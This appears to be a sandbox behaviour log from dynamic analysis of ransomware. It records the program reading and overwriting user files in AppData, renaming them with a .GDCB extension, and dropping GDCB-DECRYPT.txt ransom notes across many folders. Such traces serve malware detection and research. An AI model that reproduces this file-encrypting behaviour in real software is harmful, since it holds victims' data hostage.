File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Process Map for Basic Flowchart.xltx, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Process Map for Basic Flowchart.xltx, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Process Map for Basic Flowchart.xltx, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Process Map for Basic Flowchart.xltx.GDCB True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Process Map for Cross-Functional Flowchart.xltx, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Process Map for Cross-Functional Flowchart.xltx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Process Map for Cross-Functional Flowchart.xltx, size = 1048576, size_out = 144734 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Process Map for Cross-Functional Flowchart.xltx, size = 144736 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Process Map for Cross-Functional Flowchart.xltx, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Process Map for Cross-Functional Flowchart.xltx, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Process Map for Cross-Functional Flowchart.xltx, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Process Map for Cross-Functional Flowchart.xltx.GDCB True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Stock symbols comparison.xltm, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Stock symbols comparison.xltm, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Stock symbols comparison.xltm, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Stock symbols comparison.xltm, size = 1048576 True 1
Fn
Data
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Stock symbols comparison.xltm, size = 1048576, size_out = 410506 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Stock symbols comparison.xltm, size = 410512 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Stock symbols comparison.xltm, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Stock symbols comparison.xltm, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Stock symbols comparison.xltm, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Stock symbols comparison.xltm.GDCB True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Welcome to Excel.xltx, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Welcome to Excel.xltx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Welcome to Excel.xltx, size = 1048576, size_out = 494747 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Welcome to Excel.xltx, size = 494752 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Welcome to Excel.xltx, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Welcome to Excel.xltx, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Welcome to Excel.xltx, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Welcome to Excel.xltx.GDCB True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\UProof\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\UProof\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Vault\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Vault\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\AccountPictures\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\AccountPictures\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Libraries\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Libraries\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Network Shortcuts\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Network Shortcuts\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Recent\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Recent\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\SendTo\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\SendTo\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Start Menu\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Start Menu\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Templates\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Templates\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Themes\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Themes\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1440_900_POS4.jpg, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1440_900_POS4.jpg, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1440_900_POS4.jpg, size = 1048576, size_out = 75403 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1440_900_POS4.jpg, size = 75408 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1440_900_POS4.jpg, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1440_900_POS4.jpg, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1440_900_POS4.jpg, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1440_900_POS4.jpg.GDCB True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Word\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Word\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\mj7J-R46l5.pptx, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\mj7J-R46l5.pptx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\mj7J-R46l5.pptx, size = 1048576, size_out = 47335 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\mj7J-R46l5.pptx, size = 47344 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\mj7J-R46l5.pptx, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\mj7J-R46l5.pptx, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\mj7J-R46l5.pptx, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\mj7J-R46l5.pptx.GDCB True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\MlDkkPrkrB.mkv, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\MlDkkPrkrB.mkv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\MlDkkPrkrB.mkv, size = 1048576, size_out = 23217 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\MlDkkPrkrB.mkv, size = 23232 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\MlDkkPrkrB.mkv, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\MlDkkPrkrB.mkv, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\MlDkkPrkrB.mkv, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\MlDkkPrkrB.mkv.GDCB True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\MMSANU.wav, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\MMSANU.wav, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\MMSANU.wav, size = 1048576, size_out = 73007 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\MMSANU.wav, size = 73008 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\MMSANU.wav, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\MMSANU.wav, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\MMSANU.wav, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\MMSANU.wav.GDCB True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Extensions\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Extensions\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Crash Reports\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Crash Reports\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Crash Reports\events\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Crash Reports\events\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\addons.json, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\addons.json, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\addons.json, size = 1048576, size_out = 24 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\addons.json, size = 32 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\addons.json, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\addons.json, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\addons.json, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\addons.json.GDCB True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\blocklist-addons.json, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\blocklist-addons.json, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\blocklist-addons.json, size = 1048576, size_out = 460296 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\blocklist-addons.json, size = 460304 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\blocklist-addons.json, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\blocklist-addons.json, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\blocklist-addons.json, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\blocklist-addons.json.GDCB True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\blocklist-gfx.json, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
